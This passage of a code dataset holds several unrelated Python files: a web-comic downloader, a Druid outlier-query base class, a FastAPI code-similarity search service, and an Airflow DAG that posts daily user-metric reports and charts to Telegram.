This will free you\n# from having to check the website yourself to see whether it has updated.\n# (A list of web comics is available at https://nostarch.com/automatestuff2/.)\n# https://www.lefthandedtoons.com/\n# https://buttersafe.com/\n# https://www.savagechickens.com/\n# https://www.lunarbaboon.com/\n# https://completelyseriouscomics.com/\n# https://www.exocomics.com/\n# https://nonadventures.com/\n# https://moonbeard.com/\n# https://www.happletea.com/\n# a for loop that goes trough all websites\n# check the date of a posted image, if it is greater than that\n# of last visit then download it and place to a folder\n# program should remember the date of last visit\nimport requests\nimport bs4\nimport os\nimport datetime\nimport shelve\n\ncomicWebsites = [\n 'http://www.lefthandedtoons.com/',\n 'http://buttersafe.com/',\n 'http://www.savagechickens.com/',\n 'http://www.lunarbaboon.com/',\n 'http://www.exocomics.com/',\n 'http://nonadventures.com/',\n 'http://moonbeard.com/',\n 'http://www.happletea.com/'\n]\ncomicShelf = shelve.open('comicLastCheck')\ncomicShelf.setdefault(\n 'lastTimeChecked', datetime.datetime.fromtimestamp(0))\n\nos.makedirs('comics', exist_ok=True)\ncomicWebsite = comicWebsites[4]\nres = requests.get(comicWebsite)\nsoup = bs4.BeautifulSoup(res.text, 'html.parser')\ndateElem = soup.select('.date')\ndateComic = datetime.datetime.strptime(dateElem[0].getText(), \"%d %b '%y\")\nprint('Comics was posted on ', dateComic)\nprint('Last visit was on', comicShelf['lastTimeChecked'])\nif dateComic > comicShelf['lastTimeChecked']:\n comicElem = soup.select('.image-style-main-comic')\n comicUrl = comicWebsite + comicElem[0].get('src')\n res = requests.get(comicUrl)\n res.raise_for_status()\n path = os.path.join('comics', os.path.basename(comicUrl))\n print(f'Downloading image {comicUrl}...')\n imageFile = open(path, 'wb')\n for chunk in res.iter_content(100000):\n imageFile.write(chunk)\n imageFile.close()\n dateNow = datetime.datetime.now()\n comicShelf['lastTimeChecked'] = dateNow\nelse:\n print('No updates available')\ncomicShelf.close()\n", "repo_name": "shadowy-pycoder/learning_python", "sub_path": "sheduled_web_comic_downloader.py", "file_name": "sheduled_web_comic_downloader.py", "file_ext": "py", "file_size_in_byte": 2547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "shelve.open", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "15331379135", "text": "# mypy: disallow_untyped_defs=True\nfrom abc 
import abstractmethod\nfrom typing import List\n\nfrom flask import current_app\nfrom pandas import DataFrame\n\nfrom db.druid.datasource import DruidDatasource\nfrom db.druid.query_builder import GroupByQueryBuilder\nfrom web.server.routes.views.query_policy import AuthorizedQueryClient\nfrom web.server.query.request import QueryRequest\nfrom web.server.query.visualizations.base import QueryBase\nfrom web.server.query.visualizations.util import build_key_column\n\nGEO_FIELD_ORDERING = current_app.zen_config.aggregation.GEO_FIELD_ORDERING\n\n\nclass OutliersBase(QueryBase):\n '''Base class for outlier analysis queries in DQL.'''\n\n def __init__(\n self,\n request: QueryRequest,\n query_client: AuthorizedQueryClient,\n datasource: DruidDatasource,\n ):\n # Disable intermediate date filling because it is not needed for Outliers\n # score computation.\n super().__init__(request, query_client, datasource, False)\n\n self.lowest_granularity_geo = GEO_FIELD_ORDERING[-1]\n self.query_dimension_names: List[str] = []\n\n def build_query(self) -> GroupByQueryBuilder:\n query = self.request.to_druid_query(self.datasource.name)\n\n # We want to look for outliers at the report level so we add all\n # geography dimensions to the group by\n for geo_dimension in GEO_FIELD_ORDERING:\n if not geo_dimension in query.dimensions:\n query.dimensions = [*query.dimensions, geo_dimension]\n\n self.query_dimension_names = query.dimensions\n return query\n\n def build_df(self, raw_df: DataFrame) -> DataFrame:\n if raw_df.empty:\n return raw_df\n\n non_null_dimensions = [\n dimension\n for dimension in self.query_dimension_names\n if not raw_df[dimension].isnull().values.all()\n ]\n\n if self.query_dimension_names and len(non_null_dimensions) > 0:\n # Ensure that each dimension value has a unique key by including\n # values from higher up the hierarchy if neccessary.\n label_df = build_key_column(\n raw_df, 'key', non_null_dimensions, non_null_dimensions\n )\n\n return raw_df.join(label_df, on=non_null_dimensions)\n\n return raw_df\n\n @abstractmethod\n def build_response(self, df: DataFrame) -> dict:\n pass\n", "repo_name": "Zenysis/Harmony", "sub_path": "web/server/query/data_quality/outliers_base.py", "file_name": "outliers_base.py", "file_ext": "py", "file_size_in_byte": 2404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.current_app.zen_config", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 15, "usage_type": "name"}, {"api_name": "web.server.query.visualizations.base.QueryBase", "line_number": 18, "usage_type": "name"}, {"api_name": "web.server.query.request.QueryRequest", "line_number": 23, "usage_type": "name"}, {"api_name": "web.server.routes.views.query_policy.AuthorizedQueryClient", "line_number": 24, "usage_type": "name"}, {"api_name": "db.druid.datasource.DruidDatasource", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "db.druid.query_builder.GroupByQueryBuilder", "line_number": 34, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 46, "usage_type": "name"}, {"api_name": "web.server.query.visualizations.util.build_key_column", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "22673919743", "text": "import 
uvicorn\nfrom transformers import pipeline\nfrom typing import Annotated\nfrom fastapi import FastAPI, status, UploadFile, Response, Form, File\nfrom fastapi.responses import RedirectResponse\nfrom src.constants import OK_MESSAGE, NO_FILE_RETREIVED_MESSAGE\nfrom pydantic_settings import BaseSettings\nfrom qdrant_client import QdrantClient\nfrom src.pydantic_models import ListCodeComparisonResponseModel\nfrom src.utils import get_number_of_lines\n\n\nclass Settings(BaseSettings):\n    QDRANT_CLUSTER_HOST: str = \"localhost\"\n    QDRANT_CLUSTER_PORT: int = 6333\n\n\nsettings = Settings()\nqdrant_client = QdrantClient(\n    settings.QDRANT_CLUSTER_HOST, port=settings.QDRANT_CLUSTER_PORT, timeout=200\n)\n\napp = FastAPI()\npipe = pipeline(\"feature-extraction\", model=\"microsoft/codebert-base\")\n\n\n@app.get(\"/\")\nasync def main():\n    \"\"\"Redirect to /docs (relative URL)\"\"\"\n    return RedirectResponse(url=\"/docs\", status_code=status.HTTP_302_FOUND)\n\n\n@app.post(\"/v1/compareCodeFile\", status_code=status.HTTP_202_ACCEPTED)\nasync def compare_code_file(\n    file: Annotated[UploadFile, File()],\n    limit: Annotated[int, Form()],\n    response: Response,\n) -> ListCodeComparisonResponseModel:\n    if not file:\n        response.status_code = status.HTTP_422_UNPROCESSABLE_ENTITY\n        return {\"message\": NO_FILE_RETREIVED_MESSAGE}\n\n    content = str(await file.read())\n\n    embedding = pipe(content, padding=True, truncation=True)[0][0]\n\n    result = qdrant_client.search(\"code\", embedding, limit=limit)\n\n    return {\"message\": result}\n\n\n@app.get(\"/healthz\", status_code=status.HTTP_200_OK)\nasync def healthz():\n    return {\"message\": OK_MESSAGE}\n\n\n@app.on_event(\"shutdown\")\ndef on_shutdown():\n    qdrant_client.close()\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n", "repo_name": "lince098/MBD2223_Thesis", "sub_path": "BackEnd/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1783, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pydantic_settings.BaseSettings", "line_number": 13, "usage_type": "name"}, {"api_name": "qdrant_client.QdrantClient", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 23, "usage_type": "call"}, {"api_name": "transformers.pipeline", "line_number": 24, "usage_type": "call"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_302_FOUND", "line_number": 30, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 35, "usage_type": "name"}, {"api_name": "fastapi.UploadFile", "line_number": 35, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 36, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 36, "usage_type": "call"}, {"api_name": "fastapi.Response", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_422_UNPROCESSABLE_ENTITY", "line_number": 40, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 40, "usage_type": "name"}, {"api_name": "src.constants.NO_FILE_RETREIVED_MESSAGE", "line_number": 41, "usage_type": "name"}, {"api_name": "qdrant_client.search", "line_number": 47, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_202_ACCEPTED", "line_number": 33, "usage_type": 
"attribute"}, {"api_name": "fastapi.status", "line_number": 33, "usage_type": "name"}, {"api_name": "src.pydantic_models.ListCodeComparisonResponseModel", "line_number": 38, "usage_type": "name"}, {"api_name": "src.constants.OK_MESSAGE", "line_number": 54, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 52, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 52, "usage_type": "name"}, {"api_name": "qdrant_client.close", "line_number": 59, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "33819286626", "text": "from datetime import datetime, timedelta\nimport pandas as pd\nfrom airflow.decorators import dag, task\nfrom airflow.operators.python import get_current_context\nimport pandahouse as ph\nimport telegram\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport io\n\n# устанавливаем connection\nconnection = {'host': 'https://clickhouse.lab.karpov.courses',\n 'database':'simulator_20221120',\n 'user':'USER', \n 'password':'PASSWORD'\n }\n\n# выбираем необходимую тему для графиков\nfrom matplotlib import style\nsns.set_theme(({**style.library[\"fivethirtyeight\"]}))\nplt.rcParams[\"figure.figsize\"] = (15,8)\n\n\n# вставить токен для бота\nmy_token = 'my_token' \nbot = telegram.Bot(token=my_token) \n\n# вставить чат id\nchat_id = 'chat_id'\n\ndefault_args = {\n 'owner': 'd-merinov-24',\n 'depends_on_past': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'start_date': datetime(2022, 12, 16)\n }\n\nschedule_interval = '0 11 * * *'\n\n@dag(default_args=default_args, schedule_interval=schedule_interval, catchup=False)\ndef lesson_7_dag_2_merinov():\n\n @task()\n def get_dau_df_2():\n\n \"\"\"\n функция вовзвращает датафрейм с данными по DAU\n \"\"\"\n\n query = '''\n SELECT COUNT (DISTINCT user_id ) as uniq_users,\n day, os, gender, age, source \n FROM (\n\n SELECT user_id,\n toStartOfDay(toDateTime(time)) AS day, os, gender, age, source \n FROM simulator_20221120.feed_actions \n GROUP BY user_id, day,os, gender, age, source \n HAVING day > (today()-1) - 7 and day != today()\n\n UNION ALL\n\n SELECT user_id,\n toStartOfDay(toDateTime(time)) AS day, os, gender, age, source \n FROM simulator_20221120.message_actions \n GROUP BY user_id, day, os, gender, age, source \n HAVING day > (today()-1) - 7 and day != today()\n )\n GROUP BY day, os, gender, age, source \n '''\n dau_df = ph.read_clickhouse(query=query, connection=connection)\n dau_df.day = dau_df.day.dt.date\n return dau_df\n\n @task()\n def get_dau_info(dau_df):\n\n \"\"\"\n функция вовзвращает текстовый отчет по пользовательским метрикам в приложении\n dau_df: pandas.DataFrame\n датафрейм с данными по пользователя\n \"\"\"\n\n dau = dau_df.groupby('day', as_index=False).agg({'uniq_users':'sum'})\n dau['growth_rate'] = dau.uniq_users.pct_change()\n\n date = dau.day.max()\n dau_value = dau.query('day == @dau_df.day.max()').iloc[0][1]\n diff = round((dau.query('day == @dau_df.day.max()').iloc[0][2]*100), 2)\n\n if diff > 0:\n change = 'больше'\n else:\n change = 'меньше'\n\n title = '👥Пользователи'\n\n text_1 = f'За {date} DAU составил {dau_value}, что на {abs(diff)}% {change}, чем днем ранее.'\n\n source = dau_df.groupby(['day', 'source'], as_index=False)\\\n .agg({'uniq_users':'sum'})\\\n .sort_values('day')\n source['ads_growth_rate'] = source.query('source == \"ads\"').uniq_users.pct_change()\n source['organic_growth_rate'] = source.query('source == \"organic\"').uniq_users.pct_change()\n\n ads_users = 
source.query('day == @dau_df.day.max() and source == \"ads\"').iloc[0][2]\n organic_users = source.query('day == @dau_df.day.max() and source == \"organic\"').iloc[0][2]\n\n ads_growth = round(source.query('day == @dau_df.day.max() and source == \"ads\"').iloc[0][3] * 100, 2)\n organic_growth = round(source.query('day == @dau_df.day.max() and source == \"organic\"').iloc[0][4] * 100, 2)\n\n text_2 = f'Их них {ads_users} ({ads_growth}% к пред. дню) пользователей с рекламы и {organic_users} ({organic_growth}% к пред. дню) с органического трафика. '\n\n os = dau_df.groupby(['day', 'os'], as_index=False)\\\n .agg({'uniq_users':'sum'})\\\n .sort_values('day')\n os['androind_growth_rate'] = os.query('os == \"Android\"').uniq_users.pct_change()\n os['iOS_growth_rate'] = os.query('os == \"iOS\"').uniq_users.pct_change()\n\n android_users = os.query('day == @dau_df.day.max() and os == \"Android\"').iloc[0][2]\n ios_users = os.query('day == @dau_df.day.max() and os == \"iOS\"').iloc[0][2]\n\n android_growth = round(os.query('day == @dau_df.day.max() and os == \"Android\"').iloc[0][3] * 100, 2)\n ios_growth = round(os.query('day == @dau_df.day.max() and os == \"iOS\"').iloc[0][4] * 100, 2)\n\n text_3 = f'Лентой воспользовались {android_users} ({android_growth}% к пред. дню) пользователей с Android и {ios_users} пользователей с iOS({ios_growth}% к пред. дню). '\n\n return title + '\\n' + '\\n' + text_1 + '\\n' + text_2 + '\\n' + text_3 + '\\n'\n\n @task()\n def get_df_new_users():\n\n \"\"\"\n функция вовзвращает датафрейм с данными по новым пользователям\n \"\"\"\n\n query = '''with mess as (Select user_id,\n min(toDate(time)) as bd,\n os, gender, age, source\n From simulator_20221120.message_actions \n Group by user_id, os, gender, age, source\n having bd > (today()-1) - 7 and bd != today()),\n feed as \n (Select user_id,\n min(toDate(time)) as bd,\n os, gender, age, source\n From simulator_20221120.feed_actions \n Group by user_id, os, gender, age, source\n having bd > (today()-1) - 7 and bd != today())\n\n select count(distinct user_id) as users, bd, os,gender, age, source from feed l\n full Join mess r on l.user_id = r.user_id \n AND l.bd=r.bd \n AND l.os=r.os \n AND l.gender=r.gender \n AND l.age=r.age \n AND l.source = r.source\n group by bd, os,gender, age, source\n ORDER BY bd DESC'''\n df_new_users = ph.read_clickhouse(query=query, connection=connection)\n df_new_users.bd = df_new_users.bd.dt.date\n return df_new_users\n \n @task()\n def get_info_new_users(df_new_users):\n\n \"\"\"\n функция вовзвращает тексто��ый отчет по метрикам в приложении о новых пользователях\n df_new_users: pandas.DataFrame\n датафрейм с данными по новым пользователям\n \"\"\"\n\n new_users = df_new_users.groupby('bd', as_index=False).agg({'users':'sum'})\n new_users['growth_rate'] = new_users.users.pct_change()\n\n date = new_users.bd.max()\n new_users_value = new_users.query('bd == @df_new_users.bd.max()').iloc[0][1]\n diff = round((new_users.query('bd == @df_new_users.bd.max()').iloc[0][2]*100), 2)\n\n if diff > 0:\n change = 'больше'\n else:\n change = 'меньше'\n\n title = \"🆕Новые пользователи\"\n\n text_1 = f'За день пришло {new_users_value} новых пользователей, что на {abs(diff)}% {change}, чем днем ранее.'\n\n source = df_new_users.groupby(['bd', 'source'], as_index=False)\\\n .agg({'users':'sum'})\\\n .sort_values('bd')\n\n source['ads_growth_rate'] = source.query('source == \"ads\"').users.pct_change()\n source['organic_growth_rate'] = source.query('source == \"organic\"').users.pct_change()\n\n ads_users = 
source.query('bd == @df_new_users.bd.max() and source == \"ads\"').iloc[0][2]\n organic_users = source.query('bd == @df_new_users.bd.max() and source == \"organic\"').iloc[0][2]\n\n ads_growth = round(source.query('bd == @df_new_users.bd.max() and source == \"ads\"').iloc[0][3] * 100, 2)\n organic_growth = round(source.query('bd == @df_new_users.bd.max() and source == \"organic\"').iloc[0][4] * 100, 2)\n\n text_2 = f'Их них {ads_users} ({ads_growth}% к пред. дню) пользователей с рекламы и {organic_users} ({organic_growth}% к пред. дню) с органического трафика. '\n\n df_new_users['age_cut'] = pd.cut(df_new_users.age, [0, 15, 21, 27, 35, 45, 60, 70, 150])\n\n male = df_new_users.groupby(['gender', 'bd'])['users'].sum()\\\n .to_frame().reset_index()\\\n .query('bd == @df_new_users.bd.max() and gender == 1')\\\n .iloc[0][2]\n female = df_new_users.groupby(['gender', 'bd'])['users'].sum()\\\n .to_frame().reset_index()\\\n .query('bd == @df_new_users.bd.max() and gender == 0')\\\n .iloc[0][2]\n\n age = df_new_users.groupby(['age_cut', 'bd'])['users'].sum()\\\n .to_frame().reset_index()\\\n .sort_values(['bd', 'users'], ascending=False)\\\n .iloc[0][0]\n male_share = round(male/(female+male)*100)\n female_share = round(female/(female+male)*100)\n\n text_3 = f'Среди новых пользователей мужчин - {male} ({male_share}%) человек, девушек - {female} ({female_share}%) человек. Наибольшее число новых пользователей в возрасте {age}'\n\n\n return title+ '\\n' + '\\n' + text_1 + '\\n' + text_2 + '\\n' + text_3\n \n @task()\n def get_likes_views_df():\n \n \"\"\"\n функция вовзвращает датафрейм с данными по лайкам и просмотрам\n \"\"\"\n query = '''SELECT toStartOfDay(toDateTime(time)) AS day,\n count(user_id) as actions,\n action \n FROM simulator_20221120.feed_actions\n WHERE day > (today()-1) - 7 and day != today()\n GROUP BY toStartOfDay(toDateTime(time)), action\n ORDER BY day DESC '''\n\n likes_views_df = ph.read_clickhouse(query=query, connection=connection)\n likes_views_df.day = likes_views_df.day.dt.date\n return likes_views_df\n\n @task()\n def get_messages_df():\n \n \"\"\"\n функция вовзвращает датафрейм с данными по сообщениям\n \"\"\"\n\n query = '''SELECT toStartOfDay(toDateTime(time)) AS day,\n count(user_id) as messages\n FROM simulator_20221120.message_actions\n WHERE day > (today()-1) - 7 and day != today()\n GROUP BY toStartOfDay(toDateTime(time))\n ORDER BY day DESC'''\n messages_df = ph.read_clickhouse(query=query, connection=connection)\n # messages_df.day = likes_views_df.day.dt.date\n\n return messages_df\n @task()\n def get_info_likes_views_mess(likes_views_df, messages_df):\n\n \"\"\"\n функция вовзвращает текстовый отчет по метрикам в приложении о лай��ах, просмотрах и сообщениях\n likes_views_df: pandas.DataFrame\n датафрейм с данными по лайкам и просмотрам\n messages_df: pandas.DataFrame\n датафрейм с данными по сообщениям\n \"\"\"\n\n actions_df = likes_views_df.groupby(['day', 'action'], as_index=False)\\\n .agg({'actions':'sum'})\\\n .sort_values('day')\n actions_df['like_growth_rate'] = actions_df.query('action == \"like\"').actions.pct_change()\n actions_df['view_growth_rate'] = actions_df.query('action == \"view\"').actions.pct_change()\n\n likes = actions_df.query('day == @actions_df.day.max() and action == \"like\"').iloc[0][2]\n views = actions_df.query('day == @actions_df.day.max() and action == \"view\"').iloc[0][2]\n\n likes_growth = round(actions_df.query('day == @actions_df.day.max() and action == \"like\"').iloc[0][3] * 100, 2)\n views_growth = 
round(actions_df.query('day == @actions_df.day.max() and action == \"view\"').iloc[0][4] * 100, 2)\n\n ctr = round(likes/views, 4)*100\n\n title = \"💖💬Активность\"\n\n text_1 = f'За вчера было поставлено {likes} лайков ({likes_growth}% к пред. дню) и просмотрено {views} постов ({views_growth}% к пред. дню). CTR составил {ctr}%'\n\n mes_1 = messages_df.sort_values('day', ascending=False).iloc[0][1]\n mes_0 = messages_df.sort_values('day', ascending=False).iloc[1][1]\n\n mes_diff = round(mes_1/mes_0 - 1, 2)*100\n\n text_2 = f'Также было отправлено {mes_1} сообщений ({mes_diff}% к пред. дню)'\n\n return title + '\\n'+ '\\n' + text_1 + '\\n' + text_2\n \n @task()\n def send_plot_dau_df(dau_df):\n\n \"\"\"\n функция отпраляет графики на основании данных о DAU\n dau_df: pandas.DataFrame\n датафрейм с данными по пользователям\n \"\"\"\n\n dau_df.day = pd.to_datetime(dau_df[\"day\"])\n dau_df = dau_df.sort_values('day')\n dau_df.day = dau_df.day.dt.strftime('%d-%m')\n\n plt.subplot(212)\n plt.title('Динамика DAU')\n sns.lineplot(y = 'uniq_users', x='day', data=dau_df)\n plt.subplot(221)\n plt.title('Динамика DAU в разбивке по OS')\n sns.lineplot(y = dau_df.uniq_users, x=dau_df.day, hue=dau_df.os)\n plt.subplot(222)\n plt.title('Динамика DAU в разбивке по Source')\n sns.lineplot(y = dau_df.uniq_users, x=dau_df.day, hue=dau_df.source)\n\n plot_object = io.BytesIO()\n plt.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = 'dau.png'\n plt.close()\n bot.sendPhoto(chat_id=chat_id, photo=plot_object, parse_mode='HTML')\n \n @task()\n def send_plot_new_users_df(df_new_users):\n\n \"\"\"\n функция отпраляет графики на основании данных о новых пользователях\n df_new_users: pandas.DataFrame\n датафрейм с данными по новым пользователям\n \"\"\"\n \n df_new_users.bd = pd.to_datetime(df_new_users.bd)\n df_new_users = df_new_users.sort_values('bd').query('bd > \"1971-01-01\"')\n df_new_users.bd = df_new_users.bd.dt.strftime('%d-%m')\n\n\n plt.subplot(212)\n plt.title('динамика привлечения новых пользователей')\n sns.lineplot(y = 'users', x='bd', data=df_new_users)\n plt.subplot(221)\n plt.title('Новые пользователи в разрезе OS')\n sns.lineplot(y = 'users', x='bd', hue='os', data=df_new_users)\n plt.subplot(222)\n plt.title('Новые пользователи в разрезе Source')\n sns.lineplot(y = 'users', x='bd', hue='source', data=df_new_users)\n\n plot_object = io.BytesIO()\n plt.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = 'dau.png'\n plt.close()\n bot.sendPhoto(chat_id=chat_id, photo=plot_object, parse_mode='HTML')\n \n @task()\n def send_plot_likes_views_df(likes_views_df, messages_df):\n\n \"\"\"\n функция отпраляет графики на основании данных о сообщениях, лайках и просмотров\n likes_views_df: pandas.DataFrame\n датафрейм с данными по лайкам и просмотрам\n messages_df: pandas.DataFrame\n датафрейм с данными по сообщениям\n \"\"\"\n\n likes_views_df.day = pd.to_datetime(likes_views_df[\"day\"])\n likes_views_df = likes_views_df.sort_values('day')\n likes_views_df.day = likes_views_df.day.dt.strftime('%d-%m')\n\n messages_df.day = pd.to_datetime(messages_df[\"day\"])\n messages_df = messages_df.sort_values('day')\n messages_df.day = messages_df.day.dt.strftime('%d-%m')\n\n ctr = likes_views_df.pivot_table(index='day', columns='action', values='actions').reset_index()\n ctr['ctr'] = ctr.like / ctr.view\n ctr['ctr'] = ctr.ctr.mul(100).round(2)\n\n plt.subplot(212)\n plt.title('Динамика CTR, %')\n sns.lineplot(y = 'ctr', x='day', data=ctr)\n plt.subplot(221)\n plt.title('Активность в ленте')\n 
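# After the last two panels are drawn, the figure is serialized into an\n        # in-memory io.BytesIO buffer, rewound with seek(0), and passed directly\n        # to bot.sendPhoto, so no temporary file ever touches disk.\n        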
sns.lineplot(y = 'actions', x='day', hue='action', data=likes_views_df)\n plt.subplot(222)\n plt.title('Кол-во отправленных сообщений')\n sns.lineplot(y = 'messages', x='day', data=messages_df)\n\n plot_object = io.BytesIO()\n plt.savefig(plot_object)\n plot_object.seek(0)\n plot_object.name = 'dau.png'\n plt.close()\n bot.sendPhoto(chat_id=chat_id, photo=plot_object, parse_mode='HTML')\n \n @task()\n def send_message(title):\n\n \"\"\"\n функция отправлет сообщение \n title: str\n текст сообщения\n \"\"\"\n bot.sendMessage(chat_id=chat_id, text=title, parse_mode='HTML')\n \n @task()\n def send_message_title():\n\n \"\"\"\n функция отправлет заголовок отчета \n \"\"\"\n \n context = get_current_context()\n ds = context['ds']\n bot.sendMessage(chat_id=chat_id, text=f\"📄Ежедневный отчет по ленте новостей, и по сервису отправки сообщений. Дата: {ds}\", parse_mode='HTML')\n \n # определяем последовательность тасков\n send_message_title()\n dau_df = get_dau_df_2()\n title_1 = get_dau_info(dau_df)\n send_message(title_1)\n send_plot_dau_df(dau_df)\n df_new_users = get_df_new_users()\n title_2 = get_info_new_users(df_new_users)\n send_message(title_2)\n send_plot_new_users_df(df_new_users)\n likes_views_df = get_likes_views_df()\n messages_df = get_messages_df()\n title_3 = get_info_likes_views_mess(likes_views_df, messages_df)\n send_message(title_3)\n send_plot_likes_views_df(likes_views_df, messages_df)\n \n # запускаем dag \nlesson_7_dag_2_merinov = lesson_7_dag_2_merinov()", "repo_name": "GLaDOS070/educational_projects", "sub_path": "airflow_dag/Lesson_7_dag_2.py", "file_name": "Lesson_7_dag_2.py", "file_ext": "py", "file_size_in_byte": 19774, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seaborn.set_theme", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.style.library", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.style", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 72, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 44, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 76, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 161, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 205, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 165, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 242, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 228, "usage_type": "call"}, {"api_name": "pandahouse.read_clickhouse", "line_number": 259, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 246, "usage_type": "call"}, {"api_name": "airflow.decorators.task", "line_number": 263, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 314, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 314, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 315, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 315, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 320, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 322, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 324, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "airflow.decorators.task", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", 